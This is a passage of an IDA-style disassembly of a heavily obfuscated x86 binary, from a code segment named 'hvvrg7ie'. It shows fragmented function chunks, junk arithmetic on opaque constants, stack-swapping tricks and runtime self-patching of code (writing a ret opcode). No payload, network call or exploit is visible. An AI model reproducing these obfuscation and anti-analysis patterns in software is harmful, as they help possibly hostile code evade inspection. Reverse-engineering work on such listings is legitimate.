		jmp	loc_455AB1
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------

loc_4529E5:				; CODE XREF: hvvrg7ie:00447778j
		jmp	sub_449425

; =============== S U B	R O U T	I N E =======================================



sub_4529EA	proc near		; CODE XREF: sub_44107D-6603p
					; hvvrg7ie:00450526j

; FUNCTION CHUNK AT 00440EAD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00440EE3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A152 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F4C0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045819E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459ED9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A769 SIZE 00000027 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-0Ch]
		jmp	loc_45A769
sub_4529EA	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_315. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_4529FD:				; CODE XREF: sub_446EC2+3EDj
		jmp	loc_4532F8
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
		sbb	edi, 0E17709B3h
		jmp	sub_4541D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_452A0D:				; CODE XREF: sub_4554E8-87Fj
		or	ebp, eax
		jle	loc_446BB0
		jmp	loc_43B672
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_452A1A:				; CODE XREF: sub_443BCD:loc_443BEBj
		jnz	loc_44AD3A
		jmp	loc_444271
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_452A25:				; CODE XREF: sub_44DB53:loc_456F0Dj
					; sub_44DB53+AD43j
		mov	eax, [esp+8+var_8]
		call	sub_451703

loc_452A2D:				; CODE XREF: sub_44DB53:loc_43E62Bj
					; sub_44DB53:loc_459032j
		xchg	eax, [esp+8+var_8]
		mov	edx, eax
		call	sub_456DE7
		pop	edx
		pop	eax
		jmp	sub_44098D
; END OF FUNCTION CHUNK	FOR sub_44DB53
; ---------------------------------------------------------------------------

loc_452A3E:				; CODE XREF: hvvrg7ie:0044917Bj
		cdq
; START	OF FUNCTION CHUNK FOR sub_448100

loc_452A3F:				; CODE XREF: sub_448100:loc_44FD10j
		add	esi, 0F6A42EE3h
		xchg	esi, [esp+0]
		jmp	loc_458306
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_452A4D:				; CODE XREF: sub_439FEE:loc_439E0Aj
					; sub_45B9BB-FD6j
		test	eax, 2000h
		jmp	loc_440333
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_452A58:				; CODE XREF: sub_43EB47:loc_4460EEj
		add	eax, ebp
		add	eax, 0D69F3569h
		mov	eax, [eax]
		cmp	eax, ds:dword_448CF0
		jz	loc_43FA8C
		jmp	loc_44B401
; END OF FUNCTION CHUNK	FOR sub_43EB47
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_360. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4422A8

loc_452A74:				; CODE XREF: sub_4422A8+D9AFj
		jmp	nullsub_160
; END OF FUNCTION CHUNK	FOR sub_4422A8

; =============== S U B	R O U T	I N E =======================================



sub_452A79	proc near		; CODE XREF: sub_440AD9:loc_456A07j

var_4		= dword	ptr -4

		push	ebx
		push	edx
		pop	ebx
		xchg	ebx, [esp+4+var_4]

loc_452A7F:				; CODE XREF: sub_446966+9FFEj
		call	sub_459BE2
sub_452A79	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_458706

loc_452A84:				; CODE XREF: sub_458706:loc_43E7B9j
		jz	loc_45418F
		jmp	loc_45B031
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_452A8F:				; CODE XREF: sub_44D47A-C4C4j
		mov	eax, [esi]
		pop	edi
		or	ecx, 296BCD2h

loc_452A98:				; CODE XREF: sub_44D47A:loc_44FBF1j
		mov	eax, [esp-0Ch+arg_8]
		jmp	loc_43C653
; END OF FUNCTION CHUNK	FOR sub_44D47A

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_452AA0	proc near		; DATA XREF: sub_444F61o

; FUNCTION CHUNK AT 0043A8D9 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043B2D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443360 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443D21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452DDD SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00453152 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045765E SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	ecx, [esp+0]
		mov	ebp, ecx
		jmp	loc_453152
sub_452AA0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	41A9C59Fh
		pop	eax
		or	eax, 0AD54E362h
		and	eax, ds:4000F5h
		or	eax, 39F05D26h
		js	loc_454149
; START	OF FUNCTION CHUNK FOR sub_45A003

loc_452ACE:				; CODE XREF: sub_45A003+Dj
		jmp	loc_449722
; END OF FUNCTION CHUNK	FOR sub_45A003
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_452AD3:				; CODE XREF: sub_43ECAA:loc_43D161j
		not	esi
		jmp	loc_4582C0
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_173. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_452ADB:				; CODE XREF: hvvrg7ie:0044E8F5j
		jmp	loc_44D644
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_452AE0:				; CODE XREF: sub_44989C+Dj
		jmp	loc_44ECF3
; END OF FUNCTION CHUNK	FOR sub_44989C

; =============== S U B	R O U T	I N E =======================================



sub_452AE5	proc near		; CODE XREF: hvvrg7ie:0043C392p
					; sub_44A705+7j

; FUNCTION CHUNK AT 00452920 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004545A3 SIZE 0000000B BYTES

		js	sub_43D5FD
		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_452920
sub_452AE5	endp

; ---------------------------------------------------------------------------
		adc	edx, ecx
		jmp	loc_43FF37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_452AFB:				; CODE XREF: hvvrg7ie:00445390j
					; hvvrg7ie:0044E4D9j ...
		xchg	eax, [esp+4+var_4]
		mov	edx, eax
		push	edi
		push	1C981EA2h
		pop	edi
		xor	edi, 667539AAh
		or	edi, 3A822AB7h
		add	edi, 8555A656h
		jmp	loc_44A79A
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
		add	eax, ebp
		add	eax, 0D7385EC4h
		mov	eax, [eax]
		push	eax
		call	sub_449007
		push	offset loc_4538E6
		jmp	loc_43CDD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_452B38:				; CODE XREF: sub_45AB9D-1554Aj
		cmp	edx, 464101F9h
		jmp	loc_44CE02
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_452B43:				; CODE XREF: sub_452F0E-2721j
		add	edi, 0F796A396h
		mov	[edi], eax
		pop	edi
		mov	eax, [ebp-4]
		jmp	loc_443547
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_452B54:				; CODE XREF: sub_4554E8-16891j
					; sub_442F6B:loc_446B9Fj
		xor	eax, 0CF03BE74h
		add	eax, 0D35D6415h
		add	eax, ebp
		push	offset loc_43F619
		jmp	nullsub_423
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
		push	0CF862226h
		pop	eax
		rol	eax, 19h
		or	eax, 5535D698h
		rol	eax, 1Fh
		jmp	loc_455E9C

; =============== S U B	R O U T	I N E =======================================



sub_452B83	proc near		; CODE XREF: hvvrg7ie:00448259j
					; sub_453E86:loc_451FC3p

; FUNCTION CHUNK AT 0043F436 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004426AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044272F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448D09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B5DB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D816 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044FD3C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450876 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457292 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457452 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459F46 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		push	edx

loc_452B8E:				; CODE XREF: sub_43F227-4C9Aj
		jmp	loc_457292
sub_452B83	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_452B93:				; CODE XREF: sub_44D47A-341Dj
		xor	edi, 0FF52C396h
		sub	edi, 55E64F44h
		add	edi, 0C6C9D255h
		mov	[edi], edx
		jmp	loc_452002
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_452BAC:				; CODE XREF: sub_4546E9:loc_45AD37j
		or	edi, 0E7767421h
		adc	ebp, 0EE088D54h
		jmp	loc_4504C1
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------
		test	eax, 99A73B4Bh
		jmp	loc_44BFE9
; ---------------------------------------------------------------------------
		not	edi
		jmp	sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418F0

loc_452BCF:				; CODE XREF: sub_4418F0+Dj
		jz	loc_4560C6
		jmp	loc_43C7CE
; END OF FUNCTION CHUNK	FOR sub_4418F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_452BDA:				; CODE XREF: sub_442334:loc_43E56Fj
					; sub_442334+290Bj
		call	nullsub_314
		retn
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590E0

loc_452BE0:				; CODE XREF: sub_4590E0+Bj
		jmp	loc_459972
; END OF FUNCTION CHUNK	FOR sub_4590E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_314. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514E0

loc_452BE6:				; CODE XREF: sub_4514E0:loc_4514F2j
		jmp	loc_44D654
; END OF FUNCTION CHUNK	FOR sub_4514E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44363B

loc_452BEB:				; CODE XREF: sub_44363B+Fj
		jmp	loc_453F75
; END OF FUNCTION CHUNK	FOR sub_44363B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B74

loc_452BF0:				; CODE XREF: sub_453B74-156BCj
		jmp	loc_449C92
; END OF FUNCTION CHUNK	FOR sub_453B74
; ---------------------------------------------------------------------------

loc_452BF5:				; CODE XREF: hvvrg7ie:0043AF47j
		jmp	locret_43FF31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_452BFA:				; CODE XREF: sub_442334:loc_44D3F9j
		push	esi
		jmp	loc_447DBC
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_452C00:				; CODE XREF: sub_4554E8:loc_443A9Fj
		jz	loc_456D26
		jmp	loc_443ED8
; END OF FUNCTION CHUNK	FOR sub_4554E8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_221. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_452C0C:				; CODE XREF: sub_451669+ECAj
		jmp	loc_4501E7
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_452C11:				; CODE XREF: sub_4569C6-AE9Ej
		jmp	loc_4403C6
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_452C16:				; CODE XREF: sub_43D964-11F2j
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_452C1B:				; CODE XREF: sub_44C6BE+2498j
		xchg	edx, [esp+0]
		push	esi
		push	51256665h
		pop	esi
		jmp	loc_44A6EB
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; ---------------------------------------------------------------------------
		xchg	edx, [ecx]
		jmp	loc_444278
; ---------------------------------------------------------------------------

loc_452C31:				; DATA XREF: hvvrg7ie:0043B1A6o
		add	edx, 975F0Eh
		popf
		xchg	edx, [esp]
		jmp	sub_446A16

; =============== S U B	R O U T	I N E =======================================



sub_452C40	proc near		; CODE XREF: hvvrg7ie:0044F78Ej
					; hvvrg7ie:0045B7D4p

; FUNCTION CHUNK AT 0043924D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043BB76 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044791E SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0B7A607E3h
		xchg	ebx, [esp+0]
		mov	eax, ebx
		jmp	loc_43924D
sub_452C40	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_452C53:				; CODE XREF: sub_43E60A:loc_44FCD3j
		mov	[ebx], edx
		or	ebx, 0CC5BC83Ch

loc_452C5B:				; CODE XREF: sub_444BE1:loc_458FFDj
		jmp	loc_441FB6
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498FB

loc_452C60:				; CODE XREF: sub_4498FB-8107j
		jl	loc_44419C
		jmp	loc_4528DC
; END OF FUNCTION CHUNK	FOR sub_4498FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4398B7

loc_452C6B:				; CODE XREF: sub_4398B7:loc_4398BBj
		mov	eax, ds:dword_448D10
		mov	edx, [ebp-4]
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jnz	loc_452212
		jmp	loc_458AC8
; END OF FUNCTION CHUNK	FOR sub_4398B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_452C8C:				; CODE XREF: sub_456F9F-18466j
					; sub_456F9F:loc_45A437j
		push	edi
		push	0CA84911Ch
		pop	edi
		xor	edi, 0E9F3C33Eh
		and	edi, 0B3D03708h
		add	edi, 0DCF559CBh
		xchg	edi, [esp+0]
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_456F9F

; =============== S U B	R O U T	I N E =======================================



sub_452CAD	proc near		; CODE XREF: sub_43FC7F+197A0j
		push	ebx
		shr	ebx, 1Fh
sub_452CAD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43FC7F

loc_452CB1:				; CODE XREF: sub_43FC7F:loc_459416j
		and	edi, 78F39C27h
		add	edi, 8F52A0BEh
		xchg	edi, [esp+0]
		jmp	sub_458F33
; END OF FUNCTION CHUNK	FOR sub_43FC7F
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_452CC6:				; CODE XREF: hvvrg7ie:0044851Bj
		jo	loc_44E10A

loc_452CCC:				; CODE XREF: hvvrg7ie:loc_448504j
		add	eax, 0EF037FB7h
		xchg	eax, [esp]
		jmp	loc_4571EC
; ---------------------------------------------------------------------------

loc_452CDA:				; DATA XREF: sub_43FE31+5o
		call	sub_449007
		jmp	loc_449084
; ---------------------------------------------------------------------------
		mov	eax, [ebp-4]
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		push	ecx
		push	10C03F99h
		jmp	loc_44A82D
; ---------------------------------------------------------------------------
		mov	[esi], edi
		jmp	loc_4466CD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_301. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_452D00:				; CODE XREF: hvvrg7ie:loc_455BB2j
		retn
; ---------------------------------------------------------------------------

loc_452D01:				; CODE XREF: hvvrg7ie:0044554Ej
		jmp	sub_44EC16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4453EC

loc_452D06:				; CODE XREF: hvvrg7ie:0043F652j
					; sub_4453EC:loc_44A13Ej
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0]
		call	sub_44AA5B
		push	esi
		call	sub_44A1B5

loc_452D17:				; CODE XREF: sub_44191F+10C31j
		jmp	loc_43BCBE
; END OF FUNCTION CHUNK	FOR sub_4453EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_452D1C:				; CODE XREF: sub_454463:loc_44AA70j
					; sub_43A86A:loc_450B79j
		jno	loc_43B4ED
		mov	eax, [ebp-4]
		push	offset sub_43F6DB
		jmp	loc_450657
; END OF FUNCTION CHUNK	FOR sub_454463

; =============== S U B	R O U T	I N E =======================================



sub_452D2F	proc near		; DATA XREF: sub_44359D:loc_447419o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00452444 SIZE 00000009 BYTES

		add	eax, [ebp-4]
		add	eax, 5
		call	sub_43E128

loc_452D3A:				; CODE XREF: hvvrg7ie:00456568j
		jmp	loc_452444
sub_452D2F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_452D3F:				; CODE XREF: hvvrg7ie:0044694Bj
		jmp	loc_44CBB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_452D44:				; CODE XREF: sub_45B9BB-A3B9j
		jl	loc_4488A9
		mov	ecx, 0F6DFFD07h
		jmp	loc_44ADD5
; END OF FUNCTION CHUNK	FOR sub_45B9BB

; =============== S U B	R O U T	I N E =======================================



sub_452D54	proc near		; CODE XREF: hvvrg7ie:0044C056p
					; hvvrg7ie:004525E6j
		xchg	esi, [esp+0]
		pop	esi
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_44E839
		jmp	loc_44AF7E
sub_452D54	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D98D

loc_452D6A:				; CODE XREF: sub_44D98D+C05Aj
		adc	esi, 6D5C635Fh
		jp	loc_453191
		xor	ebx, esi
		jz	loc_441219
		jmp	loc_44972F
; END OF FUNCTION CHUNK	FOR sub_44D98D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_452D83:				; CODE XREF: sub_43E128:loc_44C97Aj
		cmp	eax, [ebp-0Ch]
		jnz	loc_441488
		jmp	loc_44202F
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E141

loc_452D91:				; CODE XREF: sub_44E141+13j
		pop	ecx
		and	ecx, 0B42D5BC2h
		rol	ecx, 0Ah
		add	ecx, 0EC3CEB17h
; END OF FUNCTION CHUNK	FOR sub_44E141
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_452DA1:				; CODE XREF: sub_439B29:loc_44ADD5j
		call	sub_44DB2D
; END OF FUNCTION CHUNK	FOR sub_439B29
; START	OF FUNCTION CHUNK FOR sub_44412E

loc_452DA6:				; CODE XREF: sub_44412E+1C7Dj
		jmp	loc_43AB56
; END OF FUNCTION CHUNK	FOR sub_44412E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_452DAB:				; CODE XREF: sub_451669:loc_45086Cj
		or	edi, 0E7950203h
		cmp	edi, 0BC7C061Dh
		jmp	loc_441372
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_452DBC:				; CODE XREF: sub_449425+C5C2j
		call	sub_450C5A
		push	esi
		push	77444EE8h
		pop	esi
		jmp	loc_445368
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 16h
		mov	ds:dword_459D6C, eax
		retn
; ---------------------------------------------------------------------------

loc_452DD8:				; CODE XREF: hvvrg7ie:004512E8j
		jmp	loc_442F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AA0

loc_452DDD:				; CODE XREF: sub_452AA0+6C0j
		rol	eax, 16h
		push	eax
		jmp	loc_443D94
; END OF FUNCTION CHUNK	FOR sub_452AA0
; ---------------------------------------------------------------------------
		cmp	ebx, esi
		jmp	loc_43E7CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_452DED:				; CODE XREF: sub_4414F6+18FC6j
		mov	eax, 23829242h
		call	sub_450C5A
		mov	ds:off_41D094, eax
		lea	eax, loc_44113C
		mov	byte ptr [eax],	0C3h
		jmp	loc_444306
; END OF FUNCTION CHUNK	FOR sub_4414F6

; =============== S U B	R O U T	I N E =======================================



sub_452E0B	proc near		; CODE XREF: sub_40207A+B3p
					; hvvrg7ie:0043BA17j
					; DATA XREF: ...

; FUNCTION CHUNK AT 00445FC3 SIZE 0000000C BYTES

		push	ecx
		push	7A2B7283h
		pop	ecx
		jmp	loc_445FC3
sub_452E0B	endp

; ---------------------------------------------------------------------------
		jmp	loc_43DABD
; ---------------------------------------------------------------------------
		jmp	sub_43B914
; ---------------------------------------------------------------------------

loc_452E21:				; CODE XREF: hvvrg7ie:0043B5C0j
		call	sub_439549
		test	al, al
		jz	loc_43CEC7
		jmp	loc_459403
; ---------------------------------------------------------------------------

locret_452E33:				; CODE XREF: hvvrg7ie:00451623j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_452E34:				; CODE XREF: sub_451E1C+353Bj
		jmp	loc_459220
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------

loc_452E39:				; CODE XREF: hvvrg7ie:0044F750j
		jmp	sub_44DE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_452E3E:				; CODE XREF: sub_448BC0:loc_43C61Bj
		jz	loc_445F8D
		jmp	loc_44C7B4
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
		ror	esi, 1Bh
		rol	esi, 0Fh
		jmp	sub_448057
; ---------------------------------------------------------------------------

loc_452E54:				; CODE XREF: hvvrg7ie:00454FACj
					; DATA XREF: sub_445F2A+1924o
		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_45697F
; START	OF FUNCTION CHUNK FOR sub_43C8E0

loc_452E5E:				; CODE XREF: sub_43C8E0+8ECCj
		jmp	loc_44AA8B
; END OF FUNCTION CHUNK	FOR sub_43C8E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_452E63:				; CODE XREF: sub_44D149:loc_4422F7j
		mov	ds:dword_439CA4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44D149
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A0B1

loc_452E6A:				; CODE XREF: sub_45A0B1-4BF1j
		rol	eax, 6
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_45A0B1
; ---------------------------------------------------------------------------

loc_452E6F:				; CODE XREF: hvvrg7ie:004548B6j
		jmp	loc_45435F

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_452E74	proc near		; CODE XREF: sub_4499A7-A3FCj

; FUNCTION CHUNK AT 00447656 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004540C7 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_4540C7
sub_452E74	endp

; ---------------------------------------------------------------------------

loc_452E7D:				; DATA XREF: sub_447BA6+7o
		push	ecx
		push	3B36D293h
		xchg	edx, [esp]
		mov	ecx, edx
		pop	edx
		xor	ecx, 3D3F9BB3h
		cmp	ecx, 7423300Dh
		jmp	loc_4403DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D140

loc_452E9A:				; CODE XREF: sub_43D140+366j
		push	4BC966A8h
		pop	edx
		rol	edx, 1Dh
		sub	edx, ds:4000F8h
		jmp	loc_44317B
; END OF FUNCTION CHUNK	FOR sub_43D140
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_269. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_452EAF	proc near		; CODE XREF: sub_4572D1:loc_4449A3p
		push	offset sub_451C09
		jmp	loc_456587
sub_452EAF	endp

; ---------------------------------------------------------------------------

loc_452EB9:				; CODE XREF: hvvrg7ie:0044C08Bj
		or	edi, edx

; =============== S U B	R O U T	I N E =======================================



sub_452EBB	proc near		; CODE XREF: sub_45061E:loc_4554ADp

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		xchg	edx, [esp-4+arg_0]
		jmp	sub_44612F
sub_452EBB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_452EC7:				; CODE XREF: hvvrg7ie:loc_43AC57j
		sub	ebx, 0A64F7CE6h
		xor	ebx, 0DE8FB713h
		add	ebx, 777781DDh
		mov	[ebx], eax
		call	sub_454C0E
		mov	ds:dword_41D128, eax
		call	sub_445B1F
; START	OF FUNCTION CHUNK FOR sub_4550CA

loc_452EEB:				; CODE XREF: sub_4550CA+5327j
		jmp	loc_44BFFF
; END OF FUNCTION CHUNK	FOR sub_4550CA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_452EF1:				; CODE XREF: sub_44E3B3-CB43j
		jmp	loc_445D71
; END OF FUNCTION CHUNK	FOR sub_44E3B3

; =============== S U B	R O U T	I N E =======================================



sub_452EF6	proc near		; CODE XREF: sub_45038Aj
					; DATA XREF: sub_4548C9-4549o

; FUNCTION CHUNK AT 004501D8 SIZE 00000005 BYTES

		push	28h
		push	offset loc_43CC00
		jmp	loc_4501D8
sub_452EF6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B914

loc_452F02:				; CODE XREF: sub_43B914:loc_4514D4j
		push	offset sub_45B044
		jmp	loc_44D9AE
; END OF FUNCTION CHUNK	FOR sub_43B914
; ---------------------------------------------------------------------------

loc_452F0C:				; CODE XREF: hvvrg7ie:0045291Bj
		sbb	ecx, edx

; =============== S U B	R O U T	I N E =======================================



sub_452F0E	proc near		; CODE XREF: sub_443D85+1p

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BEDB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043D0FD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E1D5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043E2C2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443547 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A5AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E714 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004507DC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00452B43 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456493 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457415 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458CB5 SIZE 00000027 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebp

loc_452F13:				; CODE XREF: hvvrg7ie:loc_446F20j
		pop	eax
		xchg	eax, [esp-4+arg_0]
		mov	ebp, esp
		push	ecx
		jmp	loc_43BEDB
sub_452F0E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C2A3

loc_452F1F:				; CODE XREF: sub_43C2A3:loc_449002j
		and	ebx, 3496F0DCh
; END OF FUNCTION CHUNK	FOR sub_43C2A3
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_452F25:				; CODE XREF: sub_4495B9:loc_440F8Cj
		sub	ebx, 4947D54h
		rol	ebx, 11h
		and	ebx, 9BF572A8h
		jmp	loc_4449DB
; END OF FUNCTION CHUNK	FOR sub_4495B9
